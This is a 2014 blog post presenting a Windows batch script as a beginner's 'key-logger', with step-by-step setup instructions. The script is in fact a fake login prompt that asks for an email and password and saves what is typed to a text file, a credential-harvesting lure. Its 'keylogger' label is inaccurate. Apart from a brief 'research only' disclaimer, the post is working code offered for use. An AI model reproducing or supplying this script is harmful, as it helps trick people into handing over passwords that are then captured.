Thursday 10 April 2014

How to create a key-logger

How to create a key-logger
Hello Everyone Today I'm going to tell you about a Tip or Key-logger How to create Key-logger In notepad,there is simple Way I made this codes for notepad

Here is a basic key logger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.
@echo off
color a
title Login
echo Please Enter Email Adress And Password
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >Log.txt
start >>Program Here<<
1.) Now paste the above code into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]

That's All you need to do .....


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